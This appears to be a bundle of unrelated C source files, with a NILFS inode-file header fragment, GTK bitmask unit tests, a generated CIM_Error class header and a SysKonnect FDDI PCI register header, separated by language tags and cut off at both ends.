ino, struct buffer_head *ibh) { kunmap(ibh->b_page); } int nilfs_ifile_create_inode(struct inode *, ino_t *, struct buffer_head **); int nilfs_ifile_delete_inode(struct inode *, ino_t); int nilfs_ifile_get_inode_block(struct inode *, ino_t, struct buffer_head **); int nilfs_ifile_read(struct super_block *sb, struct nilfs_root *root, size_t inode_size, struct nilfs_inode *raw_inode, struct inode **inodep); #endif /* _NILFS_IFILE_H */
{ "language": "C" }
/* GtkRBTree tests. * * Copyright (C) 2011, Red Hat, Inc. * Authors: Benjamin Otte <otte@gnome.org> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library. If not, see <http://www.gnu.org/licenses/>. */ #include <locale.h> #include "../../gtk/gtkbitmaskprivate.h" #include <string.h> /* how often we run the random tests */ #define N_RUNS 20 /* how many tries we do in our random tests */ #define N_TRIES 100 /* the maximum index we use for bitmask values */ #define MAX_INDEX 1000 /* UTILITIES */ static GtkBitmask * gtk_bitmask_new_parse (const char *string) { guint i, length; GtkBitmask *mask; length = strlen (string); mask = _gtk_bitmask_new (); for (i = 0; i < length; i++) { if (string[i] == '0') mask = _gtk_bitmask_set (mask, length - i - 1, FALSE); else if (string[i] == '1') mask = _gtk_bitmask_set (mask, length - i - 1, TRUE); else g_assert_not_reached (); } return mask; } #define assert_cmpmasks(mask,other) G_STMT_START { \ if (G_UNLIKELY (!_gtk_bitmask_equals (mask, other))) \ { \ char *mask_string = _gtk_bitmask_to_string (mask); \ char *other_string = _gtk_bitmask_to_string (other); \ char *msg = g_strdup_printf ("%s (%s) != %s (%s)", \ G_STRINGIFY (mask), mask_string, \ G_STRINGIFY (other), other_string); \ g_assertion_message (G_LOG_DOMAIN, __FILE__, __LINE__, G_STRFUNC, msg); \ g_free (msg); \ g_free (mask_string); \ g_free (other_string); \ } \ }G_STMT_END static const char *tests[] = { "0", "1", "1000000000000000000000000000000", "10000000000000000000000000000000", "100000000000000000000000000000000000000000000000000000000000000", "1000000000000000000000000000000000000000000000000000000000000000", "10000000000000000000000000000000000000000000000000000000000000000", "1010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010", "1000010000100001000010000100001000010000100001000010000100001000010000100001000010000100001000010000100001000010000100001000010000", "1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111" }; static GtkBitmask *masks[G_N_ELEMENTS (tests)]; /* TEST */ static void test_to_string (void) { guint i; char *to_string; for (i = 0; i < G_N_ELEMENTS (tests); i++) { to_string = _gtk_bitmask_to_string (masks[i]); g_assert_cmpstr (to_string, ==, tests[i]); g_free (to_string); } } static void test_is_empty (void) { guint i; for (i = 0; i < G_N_ELEMENTS (tests); i++) { g_assert_cmpint (_gtk_bitmask_is_empty (masks[i]), ==, i == 0); } } static void test_equals (void) { guint i, j; for (i = 0; i < G_N_ELEMENTS (tests); i++) { for (j = 0; j < G_N_ELEMENTS (tests); j++) { g_assert_cmpint (_gtk_bitmask_equals (masks[i], masks[j]), ==, i == j); } } } static void test_set (void) { guint i, j; guint indexes[N_TRIES]; GtkBitmask *copy; const GtkBitmask *mask; for (i = 0; i < N_RUNS; i++) { mask = masks[g_test_rand_int_range (0, G_N_ELEMENTS (tests))]; copy = _gtk_bitmask_copy (mask); for (j = 0; j < N_TRIES; j++) { indexes[j] = g_test_rand_int_range (0, MAX_INDEX); copy = _gtk_bitmask_set (copy, indexes[j], g_test_rand_bit ()); } for (j = 0; j < N_TRIES; j++) { copy = _gtk_bitmask_set (copy, indexes[j], _gtk_bitmask_get (mask, indexes[j])); } assert_cmpmasks (copy, mask); _gtk_bitmask_free (copy); } } static void test_union (void) { GtkBitmask *left, *right, *expected; guint run, try, n_tries; for (run = 0; run < N_RUNS; run++) { left = _gtk_bitmask_new (); right = _gtk_bitmask_new (); expected = _gtk_bitmask_new (); n_tries = g_test_perf () ? N_TRIES : g_test_rand_int_range (0, N_TRIES); for (try = 0; try < n_tries; try++) { guint id = g_test_rand_int_range (0, MAX_INDEX); if (g_test_rand_bit ()) left = _gtk_bitmask_set (left, id, TRUE); else right = _gtk_bitmask_set (right, id, TRUE); expected = _gtk_bitmask_set (expected, id, TRUE); } left = _gtk_bitmask_union (left, right); right = _gtk_bitmask_union (right, left); assert_cmpmasks (left, expected); assert_cmpmasks (right, expected); _gtk_bitmask_free (left); _gtk_bitmask_free (right); _gtk_bitmask_free (expected); } } static void test_intersect (void) { GtkBitmask *left, *right, *expected; guint run, try; gboolean intersects; for (run = 0; run < N_RUNS; run++) { left = _gtk_bitmask_new (); right = _gtk_bitmask_new (); expected = _gtk_bitmask_new (); for (try = 0; try < N_TRIES; try++) { guint id = g_test_rand_int_range (0, MAX_INDEX); gboolean set = g_test_rand_bit (); if (g_test_rand_bit ()) { left = _gtk_bitmask_set (left, id, set); expected = _gtk_bitmask_set (expected, id, set ? _gtk_bitmask_get (right, id) : 0); } else { right = _gtk_bitmask_set (right, id, set); expected = _gtk_bitmask_set (expected, id, set ? _gtk_bitmask_get (left, id) : 0); } } intersects = _gtk_bitmask_intersects (left, right); g_assert_cmpint (intersects, ==, _gtk_bitmask_intersects (right, left)); g_assert_cmpint (intersects, !=, _gtk_bitmask_is_empty (expected)); left = _gtk_bitmask_intersect (left, right); right = _gtk_bitmask_intersect (right, left); assert_cmpmasks (left, expected); assert_cmpmasks (right, expected); _gtk_bitmask_free (left); _gtk_bitmask_free (right); _gtk_bitmask_free (expected); } } static void test_intersect_hardcoded (void) { GtkBitmask *left, *right, *intersection, *expected; const char *left_str, *right_str; guint left_len, right_len; guint i, l, r; for (l = 0; l < G_N_ELEMENTS (tests); l++) { for (r = 0; r < G_N_ELEMENTS (tests); r++) { left = masks[l]; right = masks[r]; left_str = tests[l]; right_str = tests[r]; left_len = strlen (tests[l]); right_len = strlen (tests[r]); expected = _gtk_bitmask_new (); if (left_len > right_len) left_str += left_len - right_len; if (right_len > left_len) right_str += right_len - left_len; i = MIN (right_len, left_len); while (i--) { expected = _gtk_bitmask_set (expected, i, left_str[0] == '1' && right_str[0] == '1'); right_str++; left_str++; } intersection = _gtk_bitmask_intersect (_gtk_bitmask_copy (left), right); assert_cmpmasks (intersection, expected); g_assert_cmpint (_gtk_bitmask_is_empty (expected), ==, !_gtk_bitmask_intersects (left, right)); _gtk_bitmask_free (intersection); _gtk_bitmask_free (expected); } } } static void test_subtract_hardcoded (void) { GtkBitmask *left, *right, *subtracted, *expected; const char *left_str, *right_str; guint left_len, right_len; guint i, l, r; for (l = 0; l < G_N_ELEMENTS (tests); l++) { for (r = 0; r < G_N_ELEMENTS (tests); r++) { left = masks[l]; right = masks[r]; left_str = tests[l]; right_str = tests[r]; left_len = strlen (tests[l]); right_len = strlen (tests[r]); expected = _gtk_bitmask_new (); for (i = MIN (right_len, left_len); i < left_len; i++) { expected = _gtk_bitmask_set (expected, i, left_str[left_len - i - 1] == '1'); } if (left_len > right_len) left_str += left_len - right_len; if (right_len > left_len) right_str += right_len - left_len; i = MIN (right_len, left_len); while (i--) { expected = _gtk_bitmask_set (expected, i, left_str[0] == '1' && right_str[0] == '0'); right_str++; left_str++; } { char *sl = _gtk_bitmask_to_string (left); char *sr = _gtk_bitmask_to_string (right); g_test_message ("%s - %s\n", sl, sr); g_free (sl); g_free (sr); } subtracted = _gtk_bitmask_subtract (_gtk_bitmask_copy (left), right); assert_cmpmasks (subtracted, expected); _gtk_bitmask_free (subtracted); _gtk_bitmask_free (expected); } } } #define SWAP(_a, _b) G_STMT_START{ \ guint _tmp = _a; \ _a = _b; \ _b = _tmp; \ }G_STMT_END static void test_invert_range_hardcoded (void) { guint t, l, r, i; gsize r_len, l_len, ref_len; char *ref_str; GtkBitmask *bitmask, *ref; for (t = 0; t < G_N_ELEMENTS (tests); t++) { for (l = 0; l < G_N_ELEMENTS (tests); l++) { l_len = strlen (tests[l]); for (r = 0; r < G_N_ELEMENTS (tests); r++) { r_len = strlen (tests[r]); if (r_len < l_len) continue; ref_len = MAX (r_len, strlen (tests[t])); ref_str = g_strdup_printf ("%*s", (int) ref_len, tests[t]); for (i = 0; i < ref_len && ref_str[i] == ' '; i++) ref_str[i] = '0'; for (i = l_len - 1; i < r_len; i++) { ref_str[ref_len-i-1] = ref_str[ref_len-i-1] == '0' ? '1' : '0'; } ref = gtk_bitmask_new_parse (ref_str); g_free (ref_str); bitmask = gtk_bitmask_new_parse (tests[t]); bitmask = _gtk_bitmask_invert_range (bitmask, l_len - 1, r_len); assert_cmpmasks (bitmask, ref); _gtk_bitmask_free (bitmask); _gtk_bitmask_free (ref); } } } } static void test_invert_range (void) { GtkBitmask *left, *right, *intersection, *expected; guint run; guint left_start, left_end, right_start, right_end, start, end; for (run = 0; run < N_RUNS; run++) { left = _gtk_bitmask_new (); right = _gtk_bitmask_new (); expected = _gtk_bitmask_new (); left_start = g_test_rand_int_range (0, MAX_INDEX); left_end = g_test_rand_int_range (0, MAX_INDEX); if (left_start > left_end) SWAP (left_start, left_end); right_start = g_test_rand_int_range (0, MAX_INDEX); right_end = g_test_rand_int_range (0, MAX_INDEX); if (right_start > right_end) SWAP (right_start, right_end); start = MAX (left_start, right_start); end = MIN (left_end, right_end); if (left_start != left_end) left = _gtk_bitmask_invert_range (left, left_start, left_end); if (right_start != right_end) right = _gtk_bitmask_invert_range (right, right_start, right_end); if (start < end) expected = _gtk_bitmask_invert_range (expected, start, end); intersection = _gtk_bitmask_copy (left); intersection = _gtk_bitmask_intersect (intersection, right); assert_cmpmasks (intersection, expected); if (start < end) expected = _gtk_bitmask_invert_range (expected, start, end); g_assert_cmpint (_gtk_bitmask_is_empty (expected), ==, TRUE); _gtk_bitmask_free (left); _gtk_bitmask_free (right); _gtk_bitmask_free (intersection); _gtk_bitmask_free (expected); } } /* SETUP & RUNNING */ static void create_masks (void) { guint i; for (i = 0; i < G_N_ELEMENTS (tests); i++) masks[i] = gtk_bitmask_new_parse (tests[i]); } static void free_masks (void) { guint i; for (i = 0; i < G_N_ELEMENTS (tests); i++) { _gtk_bitmask_free (masks[i]); masks[i] = NULL; } } int main (int argc, char *argv[]) { int result; g_test_init (&argc, &argv, NULL); setlocale (LC_ALL, "C"); create_masks (); g_test_add_func ("/bitmask/to_string", test_to_string); g_test_add_func ("/bitmask/is_empty", test_is_empty); g_test_add_func ("/bitmask/equals", test_equals); g_test_add_func ("/bitmask/set", test_set); g_test_add_func ("/bitmask/union", test_union); g_test_add_func ("/bitmask/intersect", test_intersect); g_test_add_func ("/bitmask/intersect_hardcoded", test_intersect_hardcoded); g_test_add_func ("/bitmask/subtract_hardcoded", test_subtract_hardcoded); g_test_add_func ("/bitmask/invert_range", test_invert_range); g_test_add_func ("/bitmask/invert_range_hardcoded", test_invert_range_hardcoded); result = g_test_run (); free_masks (); return result; }
{ "language": "C" }
/* @migen@ */ /* **============================================================================== ** ** WARNING: THIS FILE WAS AUTOMATICALLY GENERATED. PLEASE DO NOT EDIT. ** **============================================================================== */ #ifndef _CIM_Error_h #define _CIM_Error_h #include <MI.h> /* **============================================================================== ** ** CIM_Error [CIM_Error] ** ** Keys: ** **============================================================================== */ typedef struct _CIM_Error { MI_Instance __instance; /* CIM_Error properties */ MI_ConstUint16Field ErrorType; MI_ConstStringField OtherErrorType; MI_ConstStringField OwningEntity; MI_ConstStringField MessageID; MI_ConstStringField Message; MI_ConstStringAField MessageArguments; MI_ConstUint16Field PerceivedSeverity; MI_ConstUint16Field ProbableCause; MI_ConstStringField ProbableCauseDescription; MI_ConstStringAField RecommendedActions; MI_ConstStringField ErrorSource; MI_ConstUint16Field ErrorSourceFormat; MI_ConstStringField OtherErrorSourceFormat; MI_ConstUint32Field CIMStatusCode; MI_ConstStringField CIMStatusCodeDescription; } CIM_Error; typedef struct _CIM_Error_Ref { CIM_Error* value; MI_Boolean exists; MI_Uint8 flags; } CIM_Error_Ref; typedef struct _CIM_Error_ConstRef { MI_CONST CIM_Error* value; MI_Boolean exists; MI_Uint8 flags; } CIM_Error_ConstRef; typedef struct _CIM_Error_Array { struct _CIM_Error** data; MI_Uint32 size; } CIM_Error_Array; typedef struct _CIM_Error_ConstArray { struct _CIM_Error MI_CONST* MI_CONST* data; MI_Uint32 size; } CIM_Error_ConstArray; typedef struct _CIM_Error_ArrayRef { CIM_Error_Array value; MI_Boolean exists; MI_Uint8 flags; } CIM_Error_ArrayRef; typedef struct _CIM_Error_ConstArrayRef { CIM_Error_ConstArray value; MI_Boolean exists; MI_Uint8 flags; } CIM_Error_ConstArrayRef; MI_EXTERN_C MI_CONST MI_ClassDecl CIM_Error_rtti; MI_INLINE MI_Result MI_CALL CIM_Error_Construct( CIM_Error* self, MI_Context* context) { return MI_ConstructInstance(context, &CIM_Error_rtti, (MI_Instance*)&self->__instance); } MI_INLINE MI_Result MI_CALL CIM_Error_Clone( const CIM_Error* self, CIM_Error** newInstance) { return MI_Instance_Clone( &self->__instance, (MI_Instance**)newInstance); } MI_INLINE MI_Boolean MI_CALL CIM_Error_IsA( const MI_Instance* self) { MI_Boolean res = MI_FALSE; return MI_Instance_IsA(self, &CIM_Error_rtti, &res) == MI_RESULT_OK && res; } MI_INLINE MI_Result MI_CALL CIM_Error_Destruct(CIM_Error* self) { return MI_Instance_Destruct(&self->__instance); } MI_INLINE MI_Result MI_CALL CIM_Error_Delete(CIM_Error* self) { return MI_Instance_Delete(&self->__instance); } MI_INLINE MI_Result MI_CALL CIM_Error_Post( const CIM_Error* self, MI_Context* context) { return MI_PostInstance(context, &self->__instance); } MI_INLINE MI_Result MI_CALL CIM_Error_Set_ErrorType( CIM_Error* self, MI_Uint16 x) { ((MI_Uint16Field*)&self->ErrorType)->value = x; ((MI_Uint16Field*)&self->ErrorType)->exists = 1; return MI_RESULT_OK; } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_ErrorType( CIM_Error* self) { memset((void*)&self->ErrorType, 0, sizeof(self->ErrorType)); return MI_RESULT_OK; } MI_INLINE MI_Result MI_CALL CIM_Error_Set_OtherErrorType( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 1, (MI_Value*)&str, MI_STRING, 0); } MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_OtherErrorType( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 1, (MI_Value*)&str, MI_STRING, MI_FLAG_BORROW); } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_OtherErrorType( CIM_Error* self) { return self->__instance.ft->ClearElementAt( (MI_Instance*)&self->__instance, 1); } MI_INLINE MI_Result MI_CALL CIM_Error_Set_OwningEntity( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 2, (MI_Value*)&str, MI_STRING, 0); } MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_OwningEntity( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 2, (MI_Value*)&str, MI_STRING, MI_FLAG_BORROW); } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_OwningEntity( CIM_Error* self) { return self->__instance.ft->ClearElementAt( (MI_Instance*)&self->__instance, 2); } MI_INLINE MI_Result MI_CALL CIM_Error_Set_MessageID( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 3, (MI_Value*)&str, MI_STRING, 0); } MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_MessageID( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 3, (MI_Value*)&str, MI_STRING, MI_FLAG_BORROW); } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_MessageID( CIM_Error* self) { return self->__instance.ft->ClearElementAt( (MI_Instance*)&self->__instance, 3); } MI_INLINE MI_Result MI_CALL CIM_Error_Set_Message( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 4, (MI_Value*)&str, MI_STRING, 0); } MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_Message( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 4, (MI_Value*)&str, MI_STRING, MI_FLAG_BORROW); } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_Message( CIM_Error* self) { return self->__instance.ft->ClearElementAt( (MI_Instance*)&self->__instance, 4); } MI_INLINE MI_Result MI_CALL CIM_Error_Set_MessageArguments( CIM_Error* self, const MI_Char** data, MI_Uint32 size) { MI_Array arr; arr.data = (void*)data; arr.size = size; return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 5, (MI_Value*)&arr, MI_STRINGA, 0); } MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_MessageArguments( CIM_Error* self, const MI_Char** data, MI_Uint32 size) { MI_Array arr; arr.data = (void*)data; arr.size = size; return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 5, (MI_Value*)&arr, MI_STRINGA, MI_FLAG_BORROW); } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_MessageArguments( CIM_Error* self) { return self->__instance.ft->ClearElementAt( (MI_Instance*)&self->__instance, 5); } MI_INLINE MI_Result MI_CALL CIM_Error_Set_PerceivedSeverity( CIM_Error* self, MI_Uint16 x) { ((MI_Uint16Field*)&self->PerceivedSeverity)->value = x; ((MI_Uint16Field*)&self->PerceivedSeverity)->exists = 1; return MI_RESULT_OK; } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_PerceivedSeverity( CIM_Error* self) { memset((void*)&self->PerceivedSeverity, 0, sizeof(self->PerceivedSeverity)); return MI_RESULT_OK; } MI_INLINE MI_Result MI_CALL CIM_Error_Set_ProbableCause( CIM_Error* self, MI_Uint16 x) { ((MI_Uint16Field*)&self->ProbableCause)->value = x; ((MI_Uint16Field*)&self->ProbableCause)->exists = 1; return MI_RESULT_OK; } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_ProbableCause( CIM_Error* self) { memset((void*)&self->ProbableCause, 0, sizeof(self->ProbableCause)); return MI_RESULT_OK; } MI_INLINE MI_Result MI_CALL CIM_Error_Set_ProbableCauseDescription( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 8, (MI_Value*)&str, MI_STRING, 0); } MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_ProbableCauseDescription( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 8, (MI_Value*)&str, MI_STRING, MI_FLAG_BORROW); } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_ProbableCauseDescription( CIM_Error* self) { return self->__instance.ft->ClearElementAt( (MI_Instance*)&self->__instance, 8); } MI_INLINE MI_Result MI_CALL CIM_Error_Set_RecommendedActions( CIM_Error* self, const MI_Char** data, MI_Uint32 size) { MI_Array arr; arr.data = (void*)data; arr.size = size; return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 9, (MI_Value*)&arr, MI_STRINGA, 0); } MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_RecommendedActions( CIM_Error* self, const MI_Char** data, MI_Uint32 size) { MI_Array arr; arr.data = (void*)data; arr.size = size; return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 9, (MI_Value*)&arr, MI_STRINGA, MI_FLAG_BORROW); } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_RecommendedActions( CIM_Error* self) { return self->__instance.ft->ClearElementAt( (MI_Instance*)&self->__instance, 9); } MI_INLINE MI_Result MI_CALL CIM_Error_Set_ErrorSource( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 10, (MI_Value*)&str, MI_STRING, 0); } MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_ErrorSource( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 10, (MI_Value*)&str, MI_STRING, MI_FLAG_BORROW); } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_ErrorSource( CIM_Error* self) { return self->__instance.ft->ClearElementAt( (MI_Instance*)&self->__instance, 10); } MI_INLINE MI_Result MI_CALL CIM_Error_Set_ErrorSourceFormat( CIM_Error* self, MI_Uint16 x) { ((MI_Uint16Field*)&self->ErrorSourceFormat)->value = x; ((MI_Uint16Field*)&self->ErrorSourceFormat)->exists = 1; return MI_RESULT_OK; } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_ErrorSourceFormat( CIM_Error* self) { memset((void*)&self->ErrorSourceFormat, 0, sizeof(self->ErrorSourceFormat)); return MI_RESULT_OK; } MI_INLINE MI_Result MI_CALL CIM_Error_Set_OtherErrorSourceFormat( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 12, (MI_Value*)&str, MI_STRING, 0); } MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_OtherErrorSourceFormat( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 12, (MI_Value*)&str, MI_STRING, MI_FLAG_BORROW); } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_OtherErrorSourceFormat( CIM_Error* self) { return self->__instance.ft->ClearElementAt( (MI_Instance*)&self->__instance, 12); } MI_INLINE MI_Result MI_CALL CIM_Error_Set_CIMStatusCode( CIM_Error* self, MI_Uint32 x) { ((MI_Uint32Field*)&self->CIMStatusCode)->value = x; ((MI_Uint32Field*)&self->CIMStatusCode)->exists = 1; return MI_RESULT_OK; } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_CIMStatusCode( CIM_Error* self) { memset((void*)&self->CIMStatusCode, 0, sizeof(self->CIMStatusCode)); return MI_RESULT_OK; } MI_INLINE MI_Result MI_CALL CIM_Error_Set_CIMStatusCodeDescription( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 14, (MI_Value*)&str, MI_STRING, 0); } MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_CIMStatusCodeDescription( CIM_Error* self, const MI_Char* str) { return self->__instance.ft->SetElementAt( (MI_Instance*)&self->__instance, 14, (MI_Value*)&str, MI_STRING, MI_FLAG_BORROW); } MI_INLINE MI_Result MI_CALL CIM_Error_Clear_CIMStatusCodeDescription( CIM_Error* self) { return self->__instance.ft->ClearElementAt( (MI_Instance*)&self->__instance, 14); } #endif /* _CIM_Error_h */
{ "language": "C" }
/****************************************************************************** * * (C)Copyright 1998,1999 SysKonnect, * a business unit of Schneider & Koch & Co. Datensysteme GmbH. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * The information in this file is provided "AS IS" without warranty. * ******************************************************************************/ #ifndef _SKFBI_H_ #define _SKFBI_H_ /* * FDDI-Fx (x := {I(SA), P(CI)}) * address calculation & function defines */ /*--------------------------------------------------------------------------*/ #ifdef PCI /* * (DV) = only defined for Da Vinci * (ML) = only defined for Monalisa */ /* * Configuration Space header */ #define PCI_VENDOR_ID 0x00 /* 16 bit Vendor ID */ #define PCI_DEVICE_ID 0x02 /* 16 bit Device ID */ #define PCI_COMMAND 0x04 /* 16 bit Command */ #define PCI_STATUS 0x06 /* 16 bit Status */ #define PCI_REV_ID 0x08 /* 8 bit Revision ID */ #define PCI_CLASS_CODE 0x09 /* 24 bit Class Code */ #define PCI_CACHE_LSZ 0x0c /* 8 bit Cache Line Size */ #define PCI_LAT_TIM 0x0d /* 8 bit Latency Timer */ #define PCI_HEADER_T 0x0e /* 8 bit Header Type */ #define PCI_BIST 0x0f /* 8 bit Built-in selftest */ #define PCI_BASE_1ST 0x10 /* 32 bit 1st Base address */ #define PCI_BASE_2ND 0x14 /* 32 bit 2nd Base address */ /* Byte 18..2b: Reserved */ #define PCI_SUB_VID 0x2c /* 16 bit Subsystem Vendor ID */ #define PCI_SUB_ID 0x2e /* 16 bit Subsystem ID */ #define PCI_BASE_ROM 0x30 /* 32 bit Expansion ROM Base Address */ /* Byte 34..33: Reserved */ #define PCI_CAP_PTR 0x34 /* 8 bit (ML) Capabilities Ptr */ /* Byte 35..3b: Reserved */ #define PCI_IRQ_LINE 0x3c /* 8 bit Interrupt Line */ #define PCI_IRQ_PIN 0x3d /* 8 bit Interrupt Pin */ #define PCI_MIN_GNT 0x3e /* 8 bit Min_Gnt */ #define PCI_MAX_LAT 0x3f /* 8 bit Max_Lat */ /* Device Dependent Region */ #define PCI_OUR_REG 0x40 /* 32 bit (DV) Our Register */ #define PCI_OUR_REG_1 0x40 /* 32 bit (ML) Our Register 1 */ #define PCI_OUR_REG_2 0x44 /* 32 bit (ML) Our Register 2 */ /* Power Management Region */ #define PCI_PM_CAP_ID 0x48 /* 8 bit (ML) Power Management Cap. ID */ #define PCI_PM_NITEM 0x49 /* 8 bit (ML) Next Item Ptr */ #define PCI_PM_CAP_REG 0x4a /* 16 bit (ML) Power Management Capabilities */ #define PCI_PM_CTL_STS 0x4c /* 16 bit (ML) Power Manag. Control/Status */ /* Byte 0x4e: Reserved */ #define PCI_PM_DAT_REG 0x4f /* 8 bit (ML) Power Manag. Data Register */ /* VPD Region */ #define PCI_VPD_CAP_ID 0x50 /* 8 bit (ML) VPD Cap. ID */ #define PCI_VPD_NITEM 0x51 /* 8 bit (ML) Next Item Ptr */ #define PCI_VPD_ADR_REG 0x52 /* 16 bit (ML) VPD Address Register */ #define PCI_VPD_DAT_REG 0x54 /* 32 bit (ML) VPD Data Register */ /* Byte 58..ff: Reserved */ /* * I2C Address (PCI Config) * * Note: The temperature and voltage sensors are relocated on a different * I2C bus. */ #define I2C_ADDR_VPD 0xA0 /* I2C address for the VPD EEPROM */ /* * Define Bits and Values of the registers */ /* PCI_VENDOR_ID 16 bit Vendor ID */ /* PCI_DEVICE_ID 16 bit Device ID */ /* Values for Vendor ID and Device ID shall be patched into the code */ /* PCI_COMMAND 16 bit Command */ #define PCI_FBTEN 0x0200 /* Bit 9: Fast Back-To-Back enable */ #define PCI_SERREN 0x0100 /* Bit 8: SERR enable */ #define PCI_ADSTEP 0x0080 /* Bit 7: Address Stepping */ #define PCI_PERREN 0x0040 /* Bit 6: Parity Report Response enable */ #define PCI_VGA_SNOOP 0x0020 /* Bit 5: VGA palette snoop */ #define PCI_MWIEN 0x0010 /* Bit 4: Memory write an inv cycl ena */ #define PCI_SCYCEN 0x0008 /* Bit 3: Special Cycle enable */ #define PCI_BMEN 0x0004 /* Bit 2: Bus Master enable */ #define PCI_MEMEN 0x0002 /* Bit 1: Memory Space Access enable */ #define PCI_IOEN 0x0001 /* Bit 0: IO Space Access enable */ /* PCI_STATUS 16 bit Status */ #define PCI_PERR 0x8000 /* Bit 15: Parity Error */ #define PCI_SERR 0x4000 /* Bit 14: Signaled SERR */ #define PCI_RMABORT 0x2000 /* Bit 13: Received Master Abort */ #define PCI_RTABORT 0x1000 /* Bit 12: Received Target Abort */ #define PCI_STABORT 0x0800 /* Bit 11: Sent Target Abort */ #define PCI_DEVSEL 0x0600 /* Bit 10..9: DEVSEL Timing */ #define PCI_DEV_FAST (0<<9) /* fast */ #define PCI_DEV_MEDIUM (1<<9) /* medium */ #define PCI_DEV_SLOW (2<<9) /* slow */ #define PCI_DATAPERR 0x0100 /* Bit 8: DATA Parity error detected */ #define PCI_FB2BCAP 0x0080 /* Bit 7: Fast Back-to-Back Capability */ #define PCI_UDF 0x0040 /* Bit 6: User Defined Features */ #define PCI_66MHZCAP 0x0020 /* Bit 5: 66 MHz PCI bus clock capable */ #define PCI_NEWCAP 0x0010 /* Bit 4: New cap. list implemented */ #define PCI_ERRBITS (PCI_PERR|PCI_SERR|PCI_RMABORT|PCI_STABORT|PCI_DATAPERR) /* PCI_REV_ID 8 bit Revision ID */ /* PCI_CLASS_CODE 24 bit Class Code */ /* Byte 2: Base Class (02) */ /* Byte 1: SubClass (02) */ /* Byte 0: Programming Interface (00) */ /* PCI_CACHE_LSZ 8 bit Cache Line Size */ /* Possible values: 0,2,4,8,16 */ /* PCI_LAT_TIM 8 bit Latency Timer */ /* PCI_HEADER_T 8 bit Header Type */ #define PCI_HD_MF_DEV 0x80 /* Bit 7: 0= single, 1= multi-func dev */ #define PCI_HD_TYPE 0x7f /* Bit 6..0: Header Layout 0= normal */ /* PCI_BIST 8 bit Built-in selftest */ #define PCI_BIST_CAP 0x80 /* Bit 7: BIST Capable */ #define PCI_BIST_ST 0x40 /* Bit 6: Start BIST */ #define PCI_BIST_RET 0x0f /* Bit 3..0: Completion Code */ /* PCI_BASE_1ST 32 bit 1st Base address */ #define PCI_MEMSIZE 0x800L /* use 2 kB Memory Base */ #define PCI_MEMBASE_BITS 0xfffff800L /* Bit 31..11: Memory Base Address */ #define PCI_MEMSIZE_BIIS 0x000007f0L /* Bit 10..4: Memory Size Req. */ #define PCI_PREFEN 0x00000008L /* Bit 3: Prefetchable */ #define PCI_MEM_TYP 0x00000006L /* Bit 2..1: Memory Type */ #define PCI_MEM32BIT (0<<1) /* Base addr anywhere in 32 Bit range */ #define PCI_MEM1M (1<<1) /* Base addr below 1 MegaByte */ #define PCI_MEM64BIT (2<<1) /* Base addr anywhere in 64 Bit range */ #define PCI_MEMSPACE 0x00000001L /* Bit 0: Memory Space Indic. */ /* 